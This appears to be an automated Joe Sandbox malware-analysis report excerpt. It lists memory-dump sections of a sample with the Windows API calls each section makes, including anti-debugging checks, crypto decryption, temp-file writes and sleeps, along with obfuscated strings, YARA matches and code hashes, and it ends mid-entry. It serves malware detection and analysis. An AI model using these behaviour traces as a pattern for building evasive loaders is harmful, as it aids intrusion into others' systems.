                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                            • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                            • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                            • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9b1000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: d25865e24d2eb52b00f81165beb0173c2a60e3fb98c252fffc7e89b88935b4d9
                                            • Instruction ID: fc7a59f15553a427745eb9336aedd69959596315e6a5c61f6aff8754d3c4fc08
                                            • Opcode Fuzzy Hash: d25865e24d2eb52b00f81165beb0173c2a60e3fb98c252fffc7e89b88935b4d9
                                            • Instruction Fuzzy Hash: EDF0FFB290C600DFC344AF28858502AFBE0FF68310F528C2DDAC583614C339A890DF47
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F4CE0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: d3a0f0e34705603d00001e7400ff102e39f7e4448a6300f45dc9523e24f2ee24
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 5A113F79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B362D375EA90EF80
                                            APIs
                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                            • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                            • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                            APIs
                                            • VirtualFree.KERNELBASE(?,?,?), ref: 00402E5C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeVirtual
                                            • String ID:
                                            • API String ID: 1263568516-0
                                            • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                            • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                            • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04D13FF1
                                            • Sleep.KERNEL32(000003E8), ref: 04D14189
                                            • __Init_thread_footer.LIBCMT ref: 04D1475E
                                            • __Init_thread_footer.LIBCMT ref: 04D14924
                                            • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04D16D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04D14B2E
                                            • __Init_thread_footer.LIBCMT ref: 04D14BBC
                                            • __Init_thread_footer.LIBCMT ref: 04D14E25
                                            • CoInitialize.OLE32(00000000), ref: 04D14EA6
                                            • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04D14EC1
                                            • __Init_thread_footer.LIBCMT ref: 04D15324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04D16CE8,0041D8A0,0042DB20,0042DB21), ref: 04D1553C
                                            • __Init_thread_footer.LIBCMT ref: 04D15632
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04D16D08,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 04D14F2F
                                              • Part of subcall function 04D20A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04D15CE6,00000000,0042C014), ref: 04D20A5E
                                              • Part of subcall function 04D20A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D20A7D
                                            • __Init_thread_footer.LIBCMT ref: 04D1428D
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                              • Part of subcall function 04D12457: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 04D1248D
                                              • Part of subcall function 04D12457: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04D124AE
                                              • Part of subcall function 04D12457: CloseHandle.KERNEL32(00000000), ref: 04D124B5
                                            • __Init_thread_footer.LIBCMT ref: 04D14469
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$]DFE$^OX*$viFO
                                            • API String ID: 529012138-4238671514
                                            • Opcode ID: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction ID: 5060a589ce501807df7cc00a1e4d9e6448dfb3b5ded3f5ab7aa13a2d67f19864
                                            • Opcode Fuzzy Hash: d653516d6fcac4cfb1a3aecc6086a08e4b36a7bab3ac3c77805d5c8949ef4ee8
                                            • Instruction Fuzzy Hash: FBF202B0E04254AFEB24CF24EC58B9DBBB1EF45308F1442D8D8096B2A1DB75BA85CF55
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 04D13897
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04D138BB
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04D13925
                                            • GetLastError.KERNEL32 ref: 04D1392F
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04D13957
                                            • GetLastError.KERNEL32 ref: 04D13961
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04D13971
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04D13A33
                                            • CryptDestroyKey.ADVAPI32(?), ref: 04D13AA5
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04D13873
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction ID: 21f841d496b464425e78b01d0871418c29d321dcd34825616e799a9663c90346
                                            • Opcode Fuzzy Hash: 40fbdad3a39ca36db9715c34553cb7c87d5092a534739f652b7b7891191c3091
                                            • Instruction Fuzzy Hash: D2815271B00218AFEF249F24DC45B99BBB5FF45300F1481A9E94DA72A1DB31AE85CF51
                                            APIs
                                              • Part of subcall function 04D20A49: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04D15CE6,00000000,0042C014), ref: 04D20A5E
                                              • Part of subcall function 04D20A49: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D20A7D
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D15324
                                            • Sleep.KERNEL32(00000BB8,00000000,?,04D16CE8,0041D8A0,0042DB20,0042DB21), ref: 04D1553C
                                            • __Init_thread_footer.LIBCMT ref: 04D15632
                                            • Sleep.KERNEL32(000007D0), ref: 04D1599C
                                            • Sleep.KERNEL32(000007D0), ref: 04D159B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: DFEK$updateSW
                                            • API String ID: 3554146954-1114742100
                                            • Opcode ID: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction ID: 25e33fc9971de52fc4fd73f490c5c8c60a2569013bfdc712dcef4680a21c23ec
                                            • Opcode Fuzzy Hash: 77110f7e8cc78f45bd0e6b43112bb3db69cfffe81fb6a3c2c0fb0262c7cc4dea
                                            • Instruction Fuzzy Hash: 5C3239B0E00254ABEF24DF24EC6879DBBB1EF45304F1441E9D8096B2A1DB79BA84CF55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !3M$"=$%j~~$1}o|$WQp_$_m_g$(xn$W;m
                                            • API String ID: 0-1256203750
                                            • Opcode ID: 43224bdd25edf3cd647e313b6fc372e26281ffc7aa97826d06acc6f3f334db7a
                                            • Instruction ID: d6abe8f475e0eacacdb01f41d916fcddc15cca9a71da71b9b6742f4696070e31
                                            • Opcode Fuzzy Hash: 43224bdd25edf3cd647e313b6fc372e26281ffc7aa97826d06acc6f3f334db7a
                                            • Instruction Fuzzy Hash: 9EB22BF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DE6C5C7744EA3558018696
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !=n$"~m$$H}~$UY$nWv$s_mo$s{30
                                            • API String ID: 0-512909168
                                            • Opcode ID: 92336c41f83edaef5c147da8f4815a1044d3038fd108ad429a67486ca4bcf684
                                            • Instruction ID: a742461c19bfc503345a51c1a8adf23fec7d29e238376e95f167cad23a3cf3b9
                                            • Opcode Fuzzy Hash: 92336c41f83edaef5c147da8f4815a1044d3038fd108ad429a67486ca4bcf684
                                            • Instruction Fuzzy Hash: 18B2F6F360C204AFD304AE2DEC8566AF7E5EF94720F1A893DEAC4C3744EA7558418697
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction ID: 71a107362d346717e648338213b5422f70619b5b18563a803cf0c70334ea4234
                                            • Opcode Fuzzy Hash: e4a2af43c5bc17daceace0d9627c377d7fa11afa99750231fbf68f24f9a3cb98
                                            • Instruction Fuzzy Hash: 78D22771E092288FDB65CE28DD407EAB7B5EB44314F1441EAD44DE7240E778AEC58F86
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 7Rwu$;w$?Tu7$M~~$uEui$x@6$s3
                                            • API String ID: 0-1099699752
                                            • Opcode ID: 3ff587d0904ef30d78b8a7dedbb0a1519a89b80801a3d3cecc35737ad6e0cb40
                                            • Instruction ID: 741e2071dee629836626839fee26b1955acd89660cc93fb981c144672eac1443
                                            • Opcode Fuzzy Hash: 3ff587d0904ef30d78b8a7dedbb0a1519a89b80801a3d3cecc35737ad6e0cb40
                                            • Instruction Fuzzy Hash: 0272F5F3A0C6009FE304AE29EC4567AB7E6EFD4720F1A893DE6C5C3744E63598058697
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #a_k$@sc$Exo$M)I$>}L
                                            • API String ID: 0-2281292081
                                            • Opcode ID: 2be7c07585bd1797ba4a00982dbf95b3576276c3add1420cfae720254de0f7b7
                                            • Instruction ID: b3f62691ee69ea32b94b5f79f9055a4ca864fc527667c63f8bf6b8bb2caaa7da
                                            • Opcode Fuzzy Hash: 2be7c07585bd1797ba4a00982dbf95b3576276c3add1420cfae720254de0f7b7
                                            • Instruction Fuzzy Hash: 0782E4F260C604AFE304AE2DDC8577ABBE9EF94320F16492DE6C4C3744EA3598158797
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,(@), ref: 0040CE9B
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,(@), ref: 0040CEA5
                                            • UnhandledExceptionFilter.KERNEL32(004024E3,?,?,?,?,?,(@), ref: 0040CEB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID: (@
                                            • API String ID: 3906539128-3675327911
                                            • Opcode ID: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction ID: 588a31918c4d7a6a9ba75f52031696ab4f5dbddd8307c033202189b188a5c7dc
                                            • Opcode Fuzzy Hash: 699cb89c4481d733bc24bc723ff59a4702c04dd7a22af15121b47e74e86c8d00
                                            • Instruction Fuzzy Hash: 5E31C475911228ABCB21DF65D8897CDBBB4AF08310F5081EAE40CA7291E7749F858F48
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 1698085c936ca5c6c6a57ee88efec3ce2b030c017204745a192f91a5fd5d0df0
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 8A025C71E002199BDF14CFA9D9806EEBBF1FF48314F24826AE919E7341D775A9818B84
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction ID: 7b974b5269c746fab1b2d50eb7f63f185c346b1ab7d2d0233e8b425283e2fae5
                                            • Opcode Fuzzy Hash: 257df63f9c0a8af9516efd39e7f9a4a8ebb064806e5099792f7b0849a0375d65
                                            • Instruction Fuzzy Hash: 2A021D71E012299FDF15CFA9C9806ADFBF5FF58318F24826ADA15A7340D731A941CB90
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 0040A556
                                            • IsDebuggerPresent.KERNEL32 ref: 0040A622
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A642
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A64C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: 8b01d550a0a2fff4667565f177a0bd7aa15c2cc699040a0714bae659939ad5a8
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 40311A75D0531CDBDB10DFA5D9897CDBBB8BF08304F1080AAE409A7290EB759A858F49
                                            APIs
                                            • IsProcessorFeaturePresent.KERNEL32(00000017,12041A13), ref: 04D1A7BD
                                            • IsDebuggerPresent.KERNEL32 ref: 04D1A889
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04D1A8A9
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 04D1A8B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                            • String ID:
                                            • API String ID: 254469556-0
                                            • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction ID: f9a2955cd46215fa5113cb004c160572572073cf051d9228f3a072e8e5f29614
                                            • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                                            • Instruction Fuzzy Hash: 6831FA75D05319EBDB10DFA4E9497CCBBB8BF08304F1041EAE409AB250EB715A85CF55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Z9?$7fCN$k[
                                            • API String ID: 0-2801061227
                                            • Opcode ID: 1f35874b3c2e3b81512a1f6f2342deabd891cf32e5b4042eaa5f4b03b7ad1d03
                                            • Instruction ID: aaaea40035f4161904196b081f25d4259236efa4e9126306edf6ac049ec3a964
                                            • Opcode Fuzzy Hash: 1f35874b3c2e3b81512a1f6f2342deabd891cf32e5b4042eaa5f4b03b7ad1d03
                                            • Instruction Fuzzy Hash: 2EB217F360C2049FE3146E29EC8567EFBE9EF94720F1A892DE6C4C3344EA3558458697
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `:@$dSw}$&W
                                            • API String ID: 0-3838474047
                                            • Opcode ID: 68b6cab49ea8060f3a71f2e66ef42c9309d437186e061ad66473642262c31131
                                            • Instruction ID: df62c0245a451c59a69d84e7b0e70bed35c0e64238b6fbca8cfd4e79f1fe9955
                                            • Opcode Fuzzy Hash: 68b6cab49ea8060f3a71f2e66ef42c9309d437186e061ad66473642262c31131
                                            • Instruction Fuzzy Hash: 7CB2E7F360C2049FE704AE29EC8567ABBE5EFD4720F16893DEAC4C7744EA3558018697
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04D12A70), ref: 04D1D102
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04D12A70), ref: 04D1D10C
                                            • UnhandledExceptionFilter.KERNEL32(04D1274A,?,?,?,?,?,04D12A70), ref: 04D1D119
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction ID: 933645556a395dfa24fbc4ef02adb743141ff18040fbb2b2f980f5ea1e49a311
                                            • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                                            • Instruction Fuzzy Hash: EB319375901228ABCB21DF64E8887CDBBB4BF18310F5045EAE81CA7260E770AB858F55
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                            • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                            • ExitProcess.KERNEL32 ref: 10005F60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                            • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                            • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >5${$ZFo
                                            • API String ID: 0-168576149
                                            • Opcode ID: d2fb36460b316c31f5c9f14a61a34234469bd65b191a375ae807089c6086e159
                                            • Instruction ID: db96329b0407ab2de1b9e60aef067c7b6e04365c210ddf2e53abf8873adf45a9
                                            • Opcode Fuzzy Hash: d2fb36460b316c31f5c9f14a61a34234469bd65b191a375ae807089c6086e159
                                            • Instruction Fuzzy Hash: D9B2F6F3A0C200AFE7046E2DEC8567ABBE5EF94320F1A453DEAC4C3744E63598158697
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664793231.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >EA$$\mOu
                                            • API String ID: 0-3185397086
                                            • Opcode ID: 0c4a9a47dc48c6d43f5d7183747ca474172a3ca7b30931f5270219aba500af33
                                            • Instruction ID: be8112b432b1c7713929cf797894a570fdfd5dcdb22d1be4b7943256b60e9f97
                                            • Opcode Fuzzy Hash: 0c4a9a47dc48c6d43f5d7183747ca474172a3ca7b30931f5270219aba500af33
                                            • Instruction Fuzzy Hash: 66B2D0F290C2049FD3046F2DEC8567AFBE9EF94720F1A493DEAC487740EA3558418A97
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: e160130273fef3913f4162cf9152a8333aea5568fc34e3c3bb4b434c7f997a1a
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: 4F317CB6900609DFDB11DF99D880AADBBF9FF09324F14404AD941A7720D771FA85CBA4
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1518329722-0
                                            • Opcode ID: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction ID: 9ffaf8f16d1feaf21b4895ba9d91ffe558ea63f081936d9fadb7ea4d2284f30e
                                            • Opcode Fuzzy Hash: 5c7dfd05e128c4447f34c82fa0a83ef235602569a1e055a837d6a0b3eab8545e
                                            • Instruction Fuzzy Hash: C2F0F4B5A002147F8724EF6EC8049DFBEE9EBC5370725826AE809D3340D9B4DD82C2D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0Z@$Z@
                                            • API String ID: 0-605451032
                                            • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                            • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
